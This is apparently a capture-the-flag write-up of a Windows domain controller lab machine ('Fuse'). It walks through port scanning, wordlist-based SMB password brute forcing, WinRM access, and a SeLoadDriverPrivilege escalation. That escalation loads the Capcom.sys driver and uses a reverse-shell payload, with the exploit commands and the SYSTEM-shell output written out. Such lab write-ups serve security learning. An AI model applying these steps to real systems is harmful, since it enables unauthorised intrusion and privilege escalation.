$ nmap -p- --min-rate 5000 10.129.2.5
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 09:28 EDT
Nmap scan report for 10.129.2.5
Host is up (0.0074s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49667/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49680/tcp open unknown
49698/tcp open unknown
Loads of ports available.
Fabricorp
When we visit the website hosted, we need to add fuse.fabricorp.local to our /etc/hosts file. I also added fabricorp.local in case. The wesbite was some sort of printing service.
When we view the CSV files of each printing log, we can the user that printed them.
We have 5 users in total:
bhult
administrator
sthompson
pmerton
tlavel
There wasn't much that I could do with this for now.
SMB + LDAP
Both of these services had nothing of interest. SMB had no null credentials or anything for the users, and LDAP didn't give me any more information.
Cewl
When stuck, try everything! We have a website and we don't have any credentials, so let's try cewl. This tool would scrape the websites and create a wordlist that we might be able to use for brute forcing SMB with crackmapexec.
Afterwards, we can now enumerate the machine. Take note that the machine resets this password rather frequently, so enumeration needs to be quick.
SMB + RPC Enum
Using these credentials, we can first check out the SMB shares available via smbmap.
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
HP-MFT01 NO ACCESS HP-MFT01
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
Not much here. I used rpcclient to further enumerate the users and stuff.
We now have more credentials! With this, we can try brute forcing the possible passwords with the username list we updated earlier.
We can test the credentials, and find that we are able to evil-winrm into the machine.
Grab the user flag!
Privilege Escalation
LoadDriver Fail
When checking our privileges, we come across a new one called SeLoadDriverPrivilege.
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
This is vulnerable because it allows us to manipulate the drivers used by the machine, and they are run as SYSTEM. This Github repository contains files that we need to exploit this:
I cloned the repo, and then downloaded the relevant files over:
But, following the PoC does not work for some reason. I think it is because the command executed in the pre-compiled binaries don't work on this machine In this case, we would probably need to change the command that is being run to directly execute a reverse shell.
Second Attempt
First, we can create a reverse shell via msfvenom.
We can change it to always run the same command regardless, which would be to execute the reverse shell we created in this case. Here's the updated code:
We can then build this project into an .exe file and download it to Kali. Remember to select x64 and Release before building. I also compiled the EoPUploaderDriver file again, just in case.
Then, download all of them again and run it as per the PoC.
*Evil-WinRM* PS C:\Users\svc-print\desktop> .\eoploaddriver_x64.exe System\\CurrentControlSet\\dfserv C:\\Temp\\Capcom.sys
*Evil-WinRM* PS C:\Users\svc-print\desktop> .\ExploitCapcom.exe LOAD C:\\Temp\\Capcom.sys
[*] Service Name: bmpccxvu0ôLS
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\????????????????????
NTSTATUS: c0000033, WinError: 0
*Evil-WinRM* PS C:\Users\svc-print\desktop> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 000001D1F5F00008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program